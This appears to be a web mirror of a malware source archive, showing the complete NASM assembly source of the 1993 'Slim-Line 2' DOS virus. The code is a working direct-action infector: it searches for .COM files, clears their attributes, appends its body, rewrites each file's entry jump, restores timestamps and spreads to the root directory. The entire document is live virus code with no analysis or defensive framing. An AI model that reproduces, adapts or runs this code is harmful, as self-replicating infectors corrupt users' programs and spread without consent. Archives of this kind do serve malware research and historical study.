mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-20 18:36:10 +00:00
4b9382ddbc
push
147 lines
2.7 KiB
NASM
147 lines
2.7 KiB
NASM
;
|
|
; The Slim-Line 2 virus, from the Slim-line virus collection.
|
|
; (C) 1993 by [DàRkRàY]/TridenT
|
|
;
|
|
; And this time it's a direct action COM infector.
|
|
; <will be commented soon>
|
|
|
|
_CODE SEGMENT
|
|
ASSUME CS:_CODE, DS:_CODE, ES:_CODE
|
|
ORG 100h
|
|
|
|
FIRST:
|
|
DB 'D', 0E9h, 000h, 000h
|
|
|
|
VX:
|
|
MOV BP,00000h
|
|
|
|
LEA SI,[BP + OLD_4_BYTES]
|
|
MOV DI,00100h
|
|
PUSH DI
|
|
MOV CX,DI
|
|
MOVSW
|
|
MOVSW
|
|
|
|
XOR SI,SI
|
|
LEA DI,[BP + LAST + 2]
|
|
PUSH SI
|
|
PUSH DI
|
|
PUSH CX
|
|
REP MOVSB
|
|
|
|
FIND_FILE:
|
|
MOV AH,04Eh
|
|
LEA DX,[BP + FIND]
|
|
MOV CL,27h
|
|
AGAIN:
|
|
INT 021h
|
|
JC GO_ROOT
|
|
|
|
YES_FILE:
|
|
MOV AX,04300h
|
|
MOV DX,09Eh
|
|
INT 021h
|
|
PUSH CX
|
|
|
|
MOV AX,04301h
|
|
XOR CX,CX
|
|
INT 021h
|
|
|
|
MOV AX,03D02h
|
|
INT 021h
|
|
XCHG AX,BX
|
|
|
|
|
|
MOV AX,05700h
|
|
INT 021h
|
|
PUSH CX
|
|
PUSH DX
|
|
|
|
MOV AH,03Fh
|
|
MOV CX,004h
|
|
LEA DX,[BP + OLD_4_BYTES]
|
|
INT 021h
|
|
|
|
MOV SI,DX
|
|
LODSW
|
|
CMP AX,0E944h
|
|
JE DONT_INFECT
|
|
|
|
MOV AL,02h
|
|
CALL SET_POINTER
|
|
|
|
SUB AX,00004h
|
|
MOV WORD PTR [BP + VX + 2],AX
|
|
MOV WORD PTR [BP + NEW_4_BYTES + 2],AX
|
|
|
|
MOV AH,040h
|
|
MOV CL,(LAST - VX)
|
|
LEA DX,[BP + VX]
|
|
INT 021h
|
|
|
|
XOR AX,AX
|
|
CALL SET_POINTER
|
|
|
|
MOV AH,040h
|
|
MOV CL,004h
|
|
LEA DX,[BP + NEW_4_BYTES]
|
|
INT 021h
|
|
|
|
DONT_INFECT:
|
|
MOV AX,05701h
|
|
POP DX
|
|
POP CX
|
|
INT 021h
|
|
|
|
MOV AH,03Eh
|
|
INT 021h
|
|
|
|
MOV AX,04301h
|
|
POP CX
|
|
MOV DX,09Eh
|
|
INT 021h
|
|
|
|
MOV AH,4Fh
|
|
JMP AGAIN
|
|
|
|
GO_ROOT:
|
|
|
|
MOV AH,03Bh
|
|
LEA DX,[BP + ROOT]
|
|
INT 021h
|
|
JC EXIT
|
|
JMP FIND_FILE
|
|
|
|
EXIT:
|
|
POP CX
|
|
POP SI
|
|
POP DI
|
|
REP MOVSB
|
|
|
|
RET
|
|
|
|
SET_POINTER:
|
|
MOV AH,042h
|
|
XOR CX,CX
|
|
CWD
|
|
INT 021h
|
|
RET
|
|
|
|
OLD_4_BYTES: NOP
|
|
NOP
|
|
NOP
|
|
RET
|
|
|
|
FIND DB "*.COM", 000h
|
|
ROOT DB "\", 000h
|
|
|
|
CUT DB ""
|
|
MARKER DB "[DR/TridenT]"
|
|
NAMED DB "Slim-Line 2 v0.9á"
|
|
COUNTRY DB "Holland"
|
|
NEW_4_BYTES DB 'D', 0E9h
|
|
LAST:
|
|
|
|
_CODE ENDS
|
|
END FIRST
|